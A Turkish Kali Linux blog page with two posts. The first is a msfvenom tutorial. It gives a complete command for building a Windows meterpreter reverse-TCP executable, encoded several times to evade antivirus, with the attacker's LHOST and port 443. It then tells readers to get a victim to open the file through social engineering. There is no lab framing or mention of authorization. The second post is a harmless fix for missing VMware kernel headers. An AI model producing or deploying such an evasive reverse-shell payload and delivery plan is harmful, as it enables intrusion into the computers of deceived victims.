kali linux etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
kali linux etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

9 Temmuz 2015 Perşembe

Msfvenom Kullanımı - (Detaylı)

Standard
Bu yazımda msfvenom kullanımı ve özelliklerinden bahsedeğim.
Metasploit ile gelen  msfvenom zararlı kod üretmemizi ve karşı taraftan reverse bağlantı almamızı sağlayan bir araçtır. Zararlı dosyayı oluşturup karşı tarafa Sosyal Mühendislik yöntemlerini kullanarak dosyayı açtırmayı başarmamız gerekiyor.







Öncelikle Kali Linux'umuzu açalım daha sonra terminale gelerek msfvenom -h komutunu girelim.

Resim  1

Resim 1'de görüldüğü gibi msfvenom aracının options seçeneklerini, parametrelerini ve bunların ne işe yaradıklarını görüyoruz.
Bizim Kullanacağımız parametreleri sıralayalım ;


  • -p : (Payload) Oluşturulan zararlı dosya açıldıktan sonra çalışan kod parçası
  • -e : (Encoder) Oluşturulan zararlı dosyayı antivirüslere yakalanmaması için şifreleyen araç seçiminin yapıldığı parametre
  • -i : (İterations) Oluşturulan zararlı dosyayı kaç defa şifreyeleceğini seçeceğimiz parametre
  • -b : (Bad Chars) Oluşturulan zararlı dosyanın çalışabilmesi için çıkaracağımız kötü karakterleri yazdığımız parametre
  • -f : (Format) Oluşturulan zararlı dosyayı hangi formatta kaydeceğimizi belirlediğimiz parametre
  • -a : (Architecture) Oluşturulan zararlı dosyanın hangi mimaride çalışacağını verdiğimiz parametre
  • --platform :Oluşturulan zararlı dosyanın hangi işletim sisteminde çalışacağını verdiğimiz parametre
Ben parametrelere şunları vereceğim.

  • -p : windows/meterpreter/reverse_tcp ( Kurbandan bağlantı almama yarayacak payload )
  • -e : x86/shikata_ga_nai ( Oluşturacağım zararlı dosyayı encode etmemi yarayacak encoder )
  • -i : 5 ( 5 defa encode etmesini istiyorum ) 
  • -b : \x00 ( Kötü karakteri çıkarıyorum )
  • -f : .exe ( Uygulama olarak kaydedeceğim)
  • -a : x86 ( 32 bitlik işletim sisteminde çalışmasını istiyorum )
  • --platform : windows ( Windows işletim sisteminde çalışmasını istiyorum )
  • LHOST : Kendi İp adresinizi yazın
  • LPORT : Hangi portu kullanmak istiyorsanız o portu yazın
Şimdi zararlı dosyamızı verilen parametreler ile oluşturualım. Terminale aşağıdaki gibi yazalım .

 # msfvenom -p windows/meterpreter/reverse_tcp  -e x86/shikata_ga_nai -i 5 -a x86 --platform windows LHOST=192.168.1.5 LPORT=443 -f exe  >  zararlidosya.exe

Resim 2

Resim 2 deki gibi bir çıktı aldıysanız sizde benim gibi zararlı dosyayı oluşturmuş oldunuz.
Artık yapmanız gerek Metasploitte 443'lü portunuzu dinleyeme almak ve Sosyal Mühendislik becerilerinizle karşı tarafa bu dosyayı yollayıp açtırmak.

Etiketler: , , , , , , , , , , , , , , ,

3 Temmuz 2015 Cuma

VMware Workstation "kernel header path is not valid" hatası - Çözümü

Standard
VMware tool kurulumu yapılırken genellikle bu sorunla karşılaşıyoruz. Kısa ve pratik olarak aşağıda vermiş olduğum komutları terminalde çalıştırırsanız sorununuz çözülecektir.

Öncelikle Kernel sürümümüzü öğrenelim.



1- Terminale Aşağıdaki Komutu Yazın

 uname -r 

Benim kernel sürümüm : 3.18.0-kali3-amd64  olarak çıktı.Sizde farklı olabilir.
Şimdi bu bir kenarda dursun.

2- Terminale Aşağıdaki Komutu Yazın
 sudo apt-get update && sudo apt-get install build-essential linux-headers-3.18.0-kali3-amd64(Benim Kernel Sürümümü Yazdım. Siz Kendi Kernel Sürümünüzü Yazınız)

Evet Artık kaldığınız yerden devam edebilirsiniz.

Etiketler: , , , , , , ,